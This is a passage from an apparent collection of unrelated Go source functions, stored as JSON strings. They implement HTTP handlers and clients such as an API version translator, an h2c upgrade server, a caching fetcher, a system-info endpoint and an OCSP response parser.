util.ParseRemoteIP(r.RemoteAddr)\n\tif err != nil {\n\t\tlogger.Warn.Printf(\"Warning: ip:port not fit. %s\\n\", r.RemoteAddr)\n\t}\n\ttrafficStat := &traffic.TrafficStat{\n\t\tAppID: appID,\n\t\tIP: userIP,\n\t\tUserID: userID,\n\t\tRequestURI: r.RequestURI,\n\t}\n\ttrafficManager.AddStat(trafficStat)\n\n\tvar (\n\t\tbody io.Reader\n\t\tbodyData []byte\n\t\tv2Req *http.Request\n\t\tresp *http.Response\n\t\tv1Resp data.ResponseV1\n\t\tv2Resp data.ResponseV2\n\t)\n\n\ttext := r.FormValue(\"text\")\n\n\tbodyData, err = json.Marshal(data.V2Body{\n\t\tText: text,\n\t})\n\tif err != nil {\n\t\tcustomError(w, \"request body format error: \"+err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tbody = bytes.NewBuffer(bodyData)\n\n\tremoteURL := fmt.Sprintf(\"%s/v1/openapi\", remoteHost)\n\tv2Req, err = http.NewRequest(http.MethodPost, remoteURL, body)\n\tif err != nil {\n\t\tcustomError(w, \"transform request failed, \"+err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tv2Req.Header.Set(\"appId\", appID)\n\tv2Req.Header.Set(\"userId\", userID)\n\n\t// Add headers for load balancing\n\tv2Req.Header.Set(\"X-Lb-Uid\", userID)\n\tresp, err = client.Do(v2Req)\n\tif err != nil {\n\t\tcustomError(w, \"http request failed, \"+err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tbodyData, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tcustomError(w, \"io failed, \"+err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tdefer resp.Body.Close()\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\terr = json.Unmarshal(bodyData, &v2Resp)\n\tlogger.Info.Printf(\"v2 response body: %s\\n\", bodyData)\n\tif err != nil {\n\t\tcustomError(w, \"unmarshal version 2 body failed, \"+err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tv1RespData := make([]data.DataV1, len(v2Resp.Answers))\n\n\tfor i, answer := range v2Resp.Answers {\n\t\tvar value string\n\t\tdataStr := \"\"\n\t\tindex := 1\n\n\t\tfor j, d := range answer.Data {\n\t\t\tif str, ok := d.(string); ok {\n\t\t\t\tdataStr += fmt.Sprintf(\"%d.%s\", index, str)\n\t\t\t\tif j != len(answer.Data)-1 {\n\t\t\t\t\tdataStr += \" \"\n\t\t\t\t}\n\t\t\t\tindex++\n\t\t\t}\n\t\t}\n\n\t\tif dataStr != \"\" {\n\t\t\tvalue = fmt.Sprintf(\"%s: %s\", answer.Value, dataStr)\n\t\t} else {\n\t\t\tvalue = answer.Value\n\t\t}\n\n\t\tv1RespData[i] = data.DataV1{\n\t\t\tType: \"text\",\n\t\t\tCmd: \"\",\n\t\t\tValue: value,\n\t\t\tData: []data.Answer{answer},\n\t\t}\n\t}\n\n\tv1Resp.ReturnCode = v2Resp.Code\n\tv1Resp.Message = v2Resp.Message\n\tv1Resp.Data = v1RespData\n\tv1Resp.Emotion = []data.Emotion{\n\t\tnewEmotion(v2Resp),\n\t}\n\n\tresult, _ := json.Marshal(v1Resp)\n\tw.Write(result)\n}", "func (u Server) ServeHTTP(w http.ResponseWriter, r *http.Request) {\n\tif hijacker, ok := w.(http.Hijacker); ok {\n\t\tif !u.DisableDirect && r.Method == \"PRI\" && r.URL.Path == \"*\" && r.Proto == \"HTTP/2.0\" {\n\t\t\tbody := \"SM\\r\\n\\r\\n\"\n\t\t\tcon, rw, err := hijacker.Hijack()\n\t\t\tdefer con.Close()\n\t\t\tif err != nil {\n\t\t\t\tlog.Printf(\"Hijack failed %v\", err)\n\t\t\t} else if n, err := io.MultiReader(r.Body, rw).Read([]byte(body)); n != len(body) {\n\t\t\t\tlog.Printf(\"%d %v\", n, err)\n\t\t\t} else {\n\t\t\t\twrap := io.MultiReader(bytes.NewBuffer([]byte(http2.ClientPreface)), rw)\n\t\t\t\tnc := &conn{\n\t\t\t\t\tConn: con,\n\t\t\t\t\tWriter: rw.Writer,\n\t\t\t\t\tReader: wrap,\n\t\t\t\t}\n\t\t\t\th2c := &http2.Server{}\n\t\t\t\th2c.ServeConn(nc, &http2.ServeConnOpts{Handler: u.Handler})\n\t\t\t\treturn\n\t\t\t}\n\t\t\thttp.Error(w, \"Server could not handle the request.\", http.StatusMethodNotAllowed)\n\t\t\treturn\n\t\t}\n\t\tif initReq := InitH2c(r); initReq != nil {\n\t\t\tfsz := uint32(1 << 14) // RFC default\n\t\t\tfor _, s := range initReq.Settings {\n\t\t\t\tif s.ID == http2.SettingMaxFrameSize && s.Val != 0 {\n\t\t\t\t\tfsz = s.Val\n\t\t\t\t}\n\t\t\t}\n\t\t\tonError := func(e error) {\n\t\t\t\tlog.Print(e)\n\t\t\t\thttp.Error(w, \"Error in upgrading initial request\", http.StatusInternalServerError)\n\t\t\t}\n\n\t\t\th2req := bytes.NewBuffer([]byte(http2.ClientPreface))\n\t\t\tfr := http2.NewFramer(h2req, nil)\n\n\t\t\tif err := fr.WriteSettings(initReq.Settings...); err != nil {\n\t\t\t\tonError(err)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\thdr := initReq.HeaderBlock\n\t\t\tif uint32(len(hdr)) <= fsz {\n\t\t\t\tif err := fr.WriteHeaders(http2.HeadersFrameParam{\n\t\t\t\t\tStreamID: 1,\n\t\t\t\t\tBlockFragment: hdr,\n\t\t\t\t\tEndHeaders: true,\n\t\t\t\t}); err != nil {\n\t\t\t\t\tonError(err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tif err := fr.WriteHeaders(http2.HeadersFrameParam{\n\t\t\t\t\tStreamID: 1,\n\t\t\t\t\tBlockFragment: hdr[:fsz],\n\t\t\t\t}); err != nil {\n\t\t\t\t\tonError(err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\thdr = hdr[fsz:]\n\t\t\t\tfor len(hdr) > 0 {\n\t\t\t\t\tif uint32(len(hdr)) > fsz {\n\t\t\t\t\t\tif err := fr.WriteContinuation(1, false, hdr[:fsz]); err != nil {\n\t\t\t\t\t\t\tonError(err)\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t\thdr = hdr[fsz:]\n\t\t\t\t\t} else {\n\t\t\t\t\t\tif err := fr.WriteContinuation(1, true, hdr); err != nil {\n\t\t\t\t\t\t\tonError(err)\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t\thdr = nil\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tcon, rw, err := hijacker.Hijack()\n\t\t\t// Note: It seems rw is a wrapper for con.\n\t\t\t// r.Body.Read still looks working unless rw.Read call.\n\t\t\tdefer con.Close()\n\t\t\tif err != nil {\n\t\t\t\tonError(err)\n\t\t\t\trw.Flush()\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\trw.Write([]byte(\n\t\t\t\t\"HTTP/1.1 101 Switching Protocols\\r\\n\" +\n\t\t\t\t\t\"Connection: upgrade\\r\\n\" +\n\t\t\t\t\t\"Upgrade: h2c\\r\\n\" +\n\t\t\t\t\t\"\\r\\n\"))\n\n\t\t\th2req2 := &h2cInitReqBody{\n\t\t\t\tFramer: fr,\n\t\t\t\tBuffer: h2req,\n\t\t\t\tBody: r.Body,\n\t\t\t\tFrameSize: fsz,\n\t\t\t}\n\t\t\tnc := &conn{\n\t\t\t\tConn: con,\n\t\t\t\tWriter: rw.Writer,\n\t\t\t\tReader: io.MultiReader(h2req2, vacuumPreface{rw}, rw),\n\t\t\t\tvacuumAck: true, // because we sent HTTP2-Settings payload\n\t\t\t}\n\t\t\th2c := &http2.Server{}\n\t\t\tfor _, s := range initReq.Settings {\n\t\t\t\tswitch s.ID {\n\t\t\t\tcase http2.SettingMaxConcurrentStreams:\n\t\t\t\t\th2c.MaxConcurrentStreams = s.Val\n\t\t\t\tcase http2.SettingMaxFrameSize:\n\t\t\t\t\th2c.MaxReadFrameSize = s.Val\n\t\t\t\tdefault:\n\t\t\t\t\t// just ignore\n\t\t\t\t}\n\t\t\t}\n\t\t\th2c.ServeConn(nc, &http2.ServeConnOpts{Handler: u.Handler})\n\t\t\treturn\n\t\t}\n\t}\n\tif u.Handler != nil {\n\t\tu.Handler.ServeHTTP(w, r)\n\t} else {\n\t\thttp.DefaultServeMux.ServeHTTP(w, r)\n\t}\n\treturn\n}", "func (f *Fetcher) Request(cmd Command, delay time.Duration) (response *http.Response, err error, isCached bool) {\n var (\n cacheId string\n )\n\n isCached = false\n\n httpClient := cmd.HttpClient()\n if httpClient == nil {\n go f.exception(\"No HTTP Client in the command:\" + cmd.MirrorUrl().String())\n return\n }\n\n req := cmd.Request()\n if req == nil {\n req, err = http.NewRequest(cmd.Method(), cmd.MirrorUrl().String(), nil)\n if err != nil {\n return\n }\n }\n cmd.SetRequest(req)\n rawUrl := cmd.MirrorUrl().String()\n\n forceUpdateCache := false\n if cmd.Method() == http.MethodGet {\n cacheId = f.cacheId(cmd.Url(), cmd.Method())\n if cacheId != \"\" {\n response = f.getCachedResponse(cacheId)\n if response != nil {\n isCached = true\n response.Request = req\n if f.LogLevel < logs.LevelNotice {\n fmt.Print(\"➰\")\n }\n logs.Info(\"Got cache for Url: %s cacheId: %s\", rawUrl, cacheId)\n return\n }\n forceUpdateCache = true\n }\n logs.Info(\"No cache found for Url: %s cacheId: %s\", rawUrl, cacheId)\n }\n\n if f.DisableKeepAlive {\n req.Close = true\n }\n\n if cmd.ReferrerUrl() != nil {\n referrer := cmd.ReferrerUrl()\n referrer.Scheme = cmd.Url().Scheme\n logs.Debug(\"Setting referrer %s for %s\", referrer, cmd.Url())\n req.Header.Set(\"Referer\", referrer.String())\n }\n\n f.passCookies(httpClient, cmd)\n\n f.sleeping(false)\n logs.Info(\"Taking a nap for %s\", delay)\n time.Sleep(delay)\n f.sleeping(true)\n\n for k, v := range f.Headers {\n req.Header.Set(k, v)\n }\n\n if req.Header.Get(\"User-Agent\") == \"\" {\n req.Header.Set(\"User-Agent\", cmd.HttpClient().UserAgent)\n }\n\n if cmd.Url().Scheme == \"http\" && req.Header.Get(\"Request-IP\") == \"\" && cmd.HttpClient().ProxyOutboundIp != \"\" {\n req.Header.Set(\"Request-IP\", cmd.HttpClient().ProxyOutboundIp)\n logs.Debug(\"Using proxy:%s\", cmd.HttpClient().ProxyOutboundIp)\n }\n\n // Do the request.\n response, err = cmd.HttpClient().Do(req)\n if err != nil {\n return\n }\n\n if response != nil {\n if response.StatusCode == http.StatusOK ||\n (httpClient.Mirror == \"\" && // if we ll cache a redirect or not found then make sure it's not a mirror\n (response.StatusCode == http.StatusMovedPermanently || response.StatusCode == http.StatusNotFound)) {\n if cacheId != \"\" {\n response.Request = req\n f.cacheResponse(cmd, cacheId, response, forceUpdateCache)\n logs.Info(\"Cached Url: %s cacheId: %s statusCode:%d\", rawUrl, cacheId, response.StatusCode)\n }\n if f.LogLevel < logs.LevelNotice {\n fmt.Print(\"🚀\")\n }\n }\n }\n\n return\n}", "func CommandHandler(w http.ResponseWriter, req *http.Request) {\n\n // Here we only allow HTTP GET requests\n switch req.Method {\n case \"GET\":\n\n // Checking if client IP is authorized\n ipauth := strings.Contains(allowedips,GetClientIP(req))\n if ipauth ==false {\n http.Error(w, \"[403] Unauthorized\", 403)\n log.Printf(GetClientIP(req) + \" - [403] Unauthorized Source IP\")\n return\n }\n\n // Data collection requests\n if req.URL.Path == string(\"/hash=\" + hashsecret + \"&fetch=\" + \"release\") {\n out, _ := exec.Command(\"cat\", \"/etc/redhat-release\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=kernel\") {\n out, _ := exec.Command(\"uname\", \"-r\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=rpmlist\") {\n out, _ := exec.Command(\"rpm\", \"-qa\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=hostname\") {\n out, _ := exec.Command(\"hostname\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=uptime\") {\n out, _ := exec.Command(\"uptime\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=df\") {\n out, _ := exec.Command(\"df\", \"-h\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=meminfo\") {\n out, _ := exec.Command(\"cat\", \"/proc/meminfo\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=cpuinfo\") {\n out, _ := exec.Command(\"cat\", \"/proc/cpuinfo\").Output()\n w.Write([]byte(out))\n\n // Return HTTP Code 400 if no matching request\n } else {\n http.Error(w, \"[400] Bad Request\", 400)\n log.Printf(GetClientIP(req) + \" - [400] Bad Request URL\")\n return\n }\n\n // Return HTTP Code 405 if someone tries a method other than GET\n default:\n http.Error(w, \"[405] Method Not Allowed\", 405)\n log.Printf(GetClientIP(req) + \" - [405] Method Not Allowed\")\n }\n}", "func handleHTTPResponse(w http.ResponseWriter, r *http.Request) {\n\tfmt.Println(r.URL.Path)\n\tif r.Method == \"GET\" {\n\t\tif r.URL.Path == \"/getpaths\" {\n\t\t\tquery := r.URL.Query()\n\t\t\tdestination := query[\"dest\"][0]\n\t\t\tsource := query[\"source\"][0]\n\t\t\t// sessionID := query[\"sid\"][0]\n\n\t\t\tformPath(source, destination)\n\t\t\tGetLatencyForPaths()\n\n\t\t\tmessage := \"\"\n\t\t\tfor i := 0; i < len(latencyArray); i++ {\n\t\t\t\tmessage += strconv.FormatFloat(latencyArray[i], 'f', -1, 32)\n\t\t\t\tmessage += \" \"\n\t\t\t}\n\n\t\t\tw.Write([]byte(message))\n\t\t}\n\t} else if r.Method == \"POST\" {\n\t\tif r.URL.Path == \"/setpath\" {\n\t\t\tpath := r.URL.Query()[\"path\"][0]\n\t\t\tpathNumber, err := strconv.Atoi(path)\n\t\t\tCheckError(err)\n\t\t\tsessionID := \"0001000100010001\"\n\t\t\tfmt.Println(pathsArray)\n\t\t\tselectedPath := []string{pathsArray[pathNumber][0], pathsArray[pathNumber][1], pathsArray[pathNumber][2]}\n\t\t\tsetPath(selectedPath, sessionID)\n\t\t\ttellClientToStart(pathsArray[pathNumber][0])\n\t\t\tw.Write([]byte(selectedPath[0] + \" \" + selectedPath[1] + \" \" + selectedPath[2]))\n\t\t} else if r.URL.Path == \"/resettest\" {\n\t\t\t// wipeDatabase()\n\t\t\tw.Write([]byte(\"success\"))\n\t\t}\n\t}\n}", "func IncomingEventGetHandler(ctx *gin.Context) {\n\tdatasource.StreamClient.Publish(config.Config.PubSub.EventName.NewIncomingRequest, []byte(\"new request came in\"))\n\tctx.JSON(http.StatusOK, gin.H{\"ok\": 1})\n}", "func GETapi(w http.ResponseWriter, request *http.Request) {\n\tw.Header().Set(\"content-type\", \"application/json\")\n\n\tURLs := mux.Vars(request)\n\tif len(URLs) != 0 {\n\t\thttp.Error(w, \"400 - Bad Request!\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tmetaInfo := &MetaInfo{}\n\tmetaInfo.Uptime = FormatSince(startTime)\n\tmetaInfo.Info = \"Service for IGC tracks\"\n\tmetaInfo.Version = \"version 1.0\"\n\n\tjson.NewEncoder(w).Encode(metaInfo)\n}", "func handler(durationMetric metrics.Timer, errorMetric metrics.Counter) func(http.ResponseWriter, *http.Request) {\n\t// Importante: Aqui sera criado uma FUNCAO que sera retornada por este metodo\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\t//Envolve toda a logica da request no durationMetric, para tirar as metricas de duracao\n\t\tdurationMetric.Time(func() {\n\t\t\tlog.Printf(\"Received request %s\\n\", r.URL.String())\n\t\t\tanimal := r.URL.Path[len(\"/api/\"):]\n\t\t\tw.Header().Set(\"Access-Control-Allow-Origin\", r.Header.Get(\"Origin\"))\n\t\t\tw.Header().Set(\"Access-Control-Allow-Methods\", \"POST, GET, OPTIONS, PUT, DELETE\")\n\t\t\tif i := rand.Intn(5); i == 4 {\n\t\t\t\tw.WriteHeader(429)\n\t\t\t\terrorMetric.Inc(1)\n\t\t\t\tw.Header().Set(\"Content-Type\", \"text/plain\")\n\t\t\t\tw.Write([]byte(\"Erro ao processar\"))\n\t\t\t\tfmt.Println(nc.Publish(\"animals_errors\", []byte(\"Erro ao processar\")))\n\t\t\t} else {\n\t\t\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\t\t\tjson.NewEncoder(w).Encode(response{Animal: animal})\n\t\t\t\tstr, _ := json.Marshal(response{Animal: animal})\n\t\t\t\tfmt.Println(nc.Publish(\"animals\", []byte(str)))\n\n\t\t\t}\n\t\t})\n\t}\n\n}", "func (client PrimitiveClient) PutDoubleResponder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func (srv *Server) handleGet(res http.ResponseWriter, req *http.Request) {\n\tfor _, rute := range srv.routeGets {\n\t\tvals, ok := rute.parse(req.URL.Path)\n\t\tif ok {\n\t\t\trute.endpoint.call(res, req, srv.evals, vals)\n\t\t\treturn\n\t\t}\n\t}\n\n\tsrv.handleFS(res, req, RequestMethodGet)\n}", "func (ss *StreamerServer) handleStop(w http.ResponseWriter, r *http.Request) {\n\tif r.Method != \"GET\" {\n\t\tw.WriteHeader(http.StatusMethodNotAllowed)\n\t\treturn\n\t}\n\tglog.Info(\"Got stop request.\")\n\tss.streamer.Stop()\n\tw.WriteHeader(http.StatusOK)\n}", "func requestHandler(w http.ResponseWriter, r *http.Request) {\n\tw.WriteHeader(200)\n\tfmt.Fprintf(w, \"%s\", buildResponse())\n}", "func mainHandler(w http.ResponseWriter, r *http.Request) {\n\t// Use otelhttp to record a span for the outgoing call, and propagate\n\t// context to the destination.\n\tdestination := os.Getenv(\"DESTINATION_URL\")\n\tresp, err := otelhttp.Get(r.Context(), destination)\n\tif err != nil {\n\t\tlog.Fatal(\"could not fetch remote endpoint\")\n\t}\n\tdefer resp.Body.Close()\n\t_, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tlog.Fatalf(\"could not read response from %v\", destination)\n\t}\n\n\tfmt.Fprint(w, strconv.Itoa(resp.StatusCode))\n}", "func two(w http.ResponseWriter,r *http.Request){\n\tif r.Method == \"GET\"{\n\t\tf, err := getPar(r.URL.Path)\n\t\tif err != nil {\n\t\t\tsendRes(405,err.Error(),w)\n\t\t\treturn\n\t\t}\n\t\terr = f.Error()\n\t\tif err != nil {\n\t\t\tsendRes(405,err.Error(),w)\n\t\t\treturn\n\t\t}\n\t\tmem := f.getCache()\n\t\tif memoire, ok := caches[mem];ok{\n\t\t\tsendJson(memoire.Res,w)\n\t\t\treturn\n\t\t}\n\t\tf.MakeArray()\n\t\tcaches[mem] = f\n\t\tsendJson(f.Res,w)\n\t\treturn\n\t}\n\tsendRes(404,\"Method Not allowed\",w)\n}", "func (api *apiConfig) MethodGet(uri string, queryParams map[string]string, decodedResponse interface{}) error {\n\t// If an override was configured, use it instead.\n\tif api.methodGet != nil {\n\t\treturn api.methodGet(uri, queryParams, decodedResponse)\n\t}\n\n\t// Form the request to make to WebFlow.\n\treq, err := http.NewRequest(\"GET\", api.BaseURL+uri, nil)\n\tif err != nil {\n\t\treturn errors.New(fmt.Sprint(\"Unable to create a new http request\", err))\n\t}\n\n\t// Webflow needs to know the auth token and the version of their API to use.\n\treq.Header.Set(\"Authorization\", \"Bearer \"+api.Token)\n\treq.Header.Set(\"Accept-Version\", defaultVersion)\n\n\t// Set query parameters.\n\tif len(queryParams) > 0 {\n\t\tquery := req.URL.Query()\n\t\tfor key, val := range queryParams {\n\t\t\tquery.Add(key, val)\n\t\t}\n\t\treq.URL.RawQuery = query.Encode()\n\t}\n\n\t// Make the request.\n\tres, err := api.Client.Do(req)\n\tif err != nil {\n\t\treturn err\n\t}\n\t// TODO: read docs for ReaderCloser.Close() to determine what to do when it errors.\n\tdefer res.Body.Close()\n\n\t// Status codes of 200 to 299 are healthy; the rest are an error, redirect, etc.\n\tif res.StatusCode >= 300 || res.StatusCode < 200 {\n\t\terrResp := &GeneralError{}\n\t\tif err := json.NewDecoder(res.Body).Decode(errResp); err != nil {\n\t\t\treturn fmt.Errorf(\"Unknown API error; status code %d; error: %+v\", res.StatusCode, err)\n\t\t}\n\t\treturn errors.New(errResp.Err)\n\t}\n\n\tif err := json.NewDecoder(res.Body).Decode(decodedResponse); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func getAPIIGC(w http.ResponseWriter, request *http.Request) {\n\n\t//request.method gives us the method selected by the client, in this api there are two methods\n\t//that are implemented GET and POST, requests made for other methods will result to an error 501\n\t//501 is an HTTP error for not implemented\n\tswitch request.Method {\n\n\tcase \"GET\":\n\t\tw.Header().Set(\"content-type\", \"application/json\")\n\n\t\tURLs := mux.Vars(request)\n\t\tif len(URLs) != 0 {\n\t\t\thttp.Error(w, \"400 - Bad Request!\", 400)\n\t\t\treturn\n\t\t}\n\n\t\ttrackIDs := make([]string, 0, 0)\n\n\t\tfor i := range IGCfiles {\n\t\t\ttrackIDs = append(trackIDs, IGCfiles[i].ID)\n\t\t}\n\n\t\tjson.NewEncoder(w).Encode(trackIDs)\n\n\tcase \"POST\":\n\t\t// Set response content-type to JSON\n\t\tw.Header().Set(\"content-type\", \"application/json\")\n\n\t\tURLt := &url{}\n\n\t\t//Url is given to the server as JSON and now we decode it to a go structure\n\t\tvar error = json.NewDecoder(request.Body).Decode(URLt)\n\t\tif error != nil {\n\t\t\thttp.Error(w, http.StatusText(400), 400)\n\t\t\treturn\n\t\t}\n\n\t\t//making a random unique ID for the track files\n\t\trand.Seed(time.Now().UnixNano())\n\n\t\ttrack, err := igc.ParseLocation(URLt.URL)\n\t\tif err != nil {\n\n\t\t\thttp.Error(w, \"Bad request!\\nMalformed URL!\", 400)\n\t\t\treturn\n\t\t}\n\n\t\tmapID = searchMap(urlMap, URLt.URL)\n\t\tinitialID = rand.Intn(100)\n\n\t\tif mapID == -1 {\n\t\t\tif findIndex(urlMap, initialID) {\n\t\t\t\tuniqueID = initialID\n\t\t\t\turlMap[uniqueID] = URLt.URL\n\n\t\t\t\tigcFile := Track{}\n\t\t\t\tigcFile.ID = strconv.Itoa(uniqueID)\n\t\t\t\tigcFile.IGCtrack = track\n\t\t\t\tIGCfiles = append(IGCfiles, igcFile)\n\t\t\t\tfmt.Fprint(w, \"{\\n\\t\\\"id\\\": \\\"\"+igcFile.ID+\"\\\"\\n}\")\n\t\t\t\treturn\n\t\t\t}\n\t\t\t\trand.Seed(time.Now().UnixNano())\n\t\t\t\tuniqueID = rand.Intn(100)\n\t\t\t\turlMap[uniqueID] = URLt.URL\n\t\t\t\tigcFile := Track{}\n\t\t\t\tigcFile.ID = strconv.Itoa(uniqueID)\n\t\t\t\tigcFile.IGCtrack = track\n\t\t\t\tIGCfiles = append(IGCfiles, igcFile)\n\t\t\t\tfmt.Fprint(w, \"{\\n\\t\\\"id\\\": \\\"\"+igcFile.ID+\"\\\"\\n}\")\n\t\t\t\treturn\n\n\t\t}\n\t\t\tuniqueID = searchMap(urlMap, URLt.URL)\n\t\t\tfmt.Fprint(w, \"{\\n\\t\\\"id\\\": \\\"\"+fmt.Sprintf(\"%d\", uniqueID)+\"\\\"\\n}\")\n\t\t\treturn\n\n\n\tdefault:\n\t\thttp.Error(w, \"This method is not implemented!\", 501)\n\t\treturn\n\n\t}\n\n}", "func (o *GetDetailNotFound) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\trw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\trw.WriteHeader(404)\n}", "func handleResponse(srcAddr *net.UDPAddr, msgId []byte, resPay *pb.KVResponse, rawMsg []byte) {\n\t// check if it's the one off propagate request\n\tif clientAddr, ok := incomingCache.Delete(msgId); ok {\n\t\tif clientAddr == self.Addr {\n\t\t\tfmt.Println(\"Something is odd.\")\n\t\t}\n\n\t\tresponseCache.Add(msgId, getNetAddress(srcAddr), rawMsg)\n\t\t_, err := conn.WriteToUDP(rawMsg, clientAddr)\n\n\t\tfmt.Println(\"💡💡💡 forwarding response to \", clientAddr.Port, resPay)\n\n\t\tif err != nil {\n\t\t\tlog.Println(\"handleResponse\", err)\n\t\t}\n\n\t}else if resPay.ReceiveData {\n\t\tresponseCache.Add(msgId, getNetAddress(srcAddr), resPay.Value)\n\t}else {\n\t\t// assume no memory restriction\n\t\tfmt.Println(\"When receive random response...\")\n\t\tincomingCache.Add(msgId, srcAddr)\n\t}\n}", "func OptionNoneResponse(resp IOutProtocol) RouterOptionFunc {\n\treturn func(r *Router) {\n\t\tr.noneResp = resp\n\t}\n}", "func serviceUnavailable(rw http.ResponseWriter, r *http.Request) {\n\n}", "func (o *ServiceInstanceLastOperationGetNotFound) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(404)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func getWithCB(url string) (*http.Response, error) {\n\tresp, err := cb.Execute(func() (interface{}, error) {\n\t\tresp, err := http.Get(url)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif resp.StatusCode == http.StatusInternalServerError {\n\t\t\treturn nil, fmt.Errorf(\"Internal Server Error\")\n\t\t}\n\n\t\treturn resp, nil\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn resp.(*http.Response), nil\n}", "func handle_uri_location(w http.ResponseWriter, r *http.Request) {\n\n\tif logutil.GPS_DEBUG > 0 {\n\t\t// Log the request before handling it\n\t\tlogutil.LogRestRequest(r.Method, r.URL.Path)\n\t}\n\n\t// Accept only GET requests to this URI\n\tif r.Method != \"GET\" {\n\t\trespond_with_error(w, http.StatusMethodNotAllowed, r.Method, r.URL.Path)\n\t\treturn\n\t}\n\n\t// Add the standard JSON header to the response\n\t// add_json_header(w) // respond_with_success does this\n\n\t// Prevent this data from being cached (client must always revalidate)\n\tadd_no_cache_header(w)\n\n\t// Construct the JSON response string\n\tresponse_string := string(cache.GetLocationAsJSON())\n\n\t// Send the response (and log it)\n\trespond_with_success(w, http.StatusOK, response_string)\n}", "func (o *GetGateSourceByGateNameAndMntNotFound) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(404)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func all(w http.ResponseWriter, r *http.Request) {\n\t// URL not supported\n\thttp.NotFound(w, r)\n}", "func getResponse(httplink string, wg *sync.WaitGroup) {\n\toutput := Result{}\n\toutput.URL = httplink\n\ttimeout := time.Duration(time.Duration(timeoutSeconds) * time.Second)\n\n\tclient := http.Client{\n\t\tTimeout: timeout,\n\t\tCheckRedirect: redirectMiddleware,\n\t}\n\n\treq, err := http.NewRequest(\"GET\", httplink, nil)\n\tif err != nil {\n\t\terrorsProcessed++\n\t\toutput.Errors = append(output.Errors, fmt.Sprintf(\"%s\", err))\n\t\tresults = append(results, output)\n\t\treturn\n\t}\n\n\treq.Header.Set(\"User-Agent\", userAgent)\n\n\tres, err := client.Do(req)\n\tif err != nil {\n\t\terrorsProcessed++\n\t\tif res != nil {\n\t\t\tloc := res.Header.Get(\"Location\")\n\t\t\toutput.StatusCode = res.StatusCode\n\t\t\tif loc != \"\" {\n\t\t\t\tfull, err := absoluteURL(loc, httplink)\n\t\t\t\tif err == nil {\n\t\t\t\t\toutput.Redirect = full\n\t\t\t\t\tresults = append(results, output)\n\t\t\t\t\taddQueueLink(full, \"head\", httplink, 0, wg)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\toutput.Errors = append(output.Errors, fmt.Sprintf(\"%s\", err))\n\t\tresults = append(results, output)\n\t\treturn\n\t}\n\n\tdefer res.Body.Close()\n\n\toutput.StatusCode = res.StatusCode\n\n\tif output.StatusCode != 200 {\n\t\terrorsProcessed++\n\t\toutput.Errors = append(output.Errors, fmt.Sprintf(\"returned status %d\", output.StatusCode))\n\t}\n\n\tresults = append(results, output)\n}", "func (client *SubscriptionClient) getHandleResponse(resp *http.Response) (SubscriptionClientGetResponse, error) {\n\tresult := SubscriptionClientGetResponse{}\n\tif val := resp.Header.Get(\"ETag\"); val != \"\" {\n\t\tresult.ETag = &val\n\t}\n\tif err := runtime.UnmarshalAsJSON(resp, &result.SubscriptionContract); err != nil {\n\t\treturn SubscriptionClientGetResponse{}, err\n\t}\n\treturn result, nil\n}", "func getParsedResponse(ctx context.Context, cfg config, connState tls.ConnectionState) (*ResponseDetails, error) {\n\tstapledResponse, err := processStaple(cfg, connState.OCSPResponse)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif stapledResponse != nil {\n\t\t// If there is a staple, attempt to cache it. The cache.Update call will resolve conflicts with an existing\n\t\t// cache enry if necessary.\n\t\treturn cfg.cache.Update(cfg.ocspRequest, stapledResponse), nil\n\t}\n\tif cachedResponse := cfg.cache.Get(cfg.ocspRequest); cachedResponse != nil {\n\t\treturn cachedResponse, nil\n\t}\n\n\t// If there is no stapled or cached response, fall back to querying the responders if that functionality has not\n\t// been disabled.\n\tif cfg.disableEndpointChecking {\n\t\treturn nil, nil\n\t}\n\texternalResponse := contactResponders(ctx, cfg)\n\tif externalResponse == nil 